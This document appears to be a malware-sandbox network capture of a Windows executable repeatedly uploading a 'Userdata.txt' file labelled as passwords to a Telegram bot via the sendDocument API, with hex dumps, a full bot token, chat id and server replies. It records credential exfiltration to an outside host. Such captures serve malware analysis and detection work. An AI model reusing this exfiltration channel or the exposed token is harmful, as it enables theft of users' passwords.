                                                                                                            2025-01-10 20:50:29 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44717,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542229,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.1050007149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:31 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33e8127340e1
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:50:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 65 38 31 32 37 33 34 30 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33e8127340e1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:32 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:32 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:32 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44718,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542232,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.1050009149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:33 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd34083c1a702a
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:50:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 30 38 33 63 31 61 37 30 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd34083c1a702aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:33 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:33 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:33 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44719,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542233,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.1050011149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:35 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd34284e8df640
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:50:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 32 38 34 65 38 64 66 36 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd34284e8df640Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:35 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:35 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:35 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44720,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542235,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.1050013149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:36 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd344ad6b1c93d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:50:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 34 61 64 36 62 31 63 39 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd344ad6b1c93dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:37 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:37 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:37 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44721,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542237,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.1050015149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:39 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd348d12913f73
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:50:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 38 64 31 32 39 31 33 66 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd348d12913f73Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:40 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:40 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:40 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44722,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542240,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.1050017149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:42 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd34d91b512df2
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:50:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 64 39 31 62 35 31 32 64 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd34d91b512df2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:42 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:42 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:42 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44723,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542242,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.1050019149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:45 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd353a2ab288d3
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:50:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 33 61 32 61 62 32 38 38 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd353a2ab288d3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:45 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:45 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
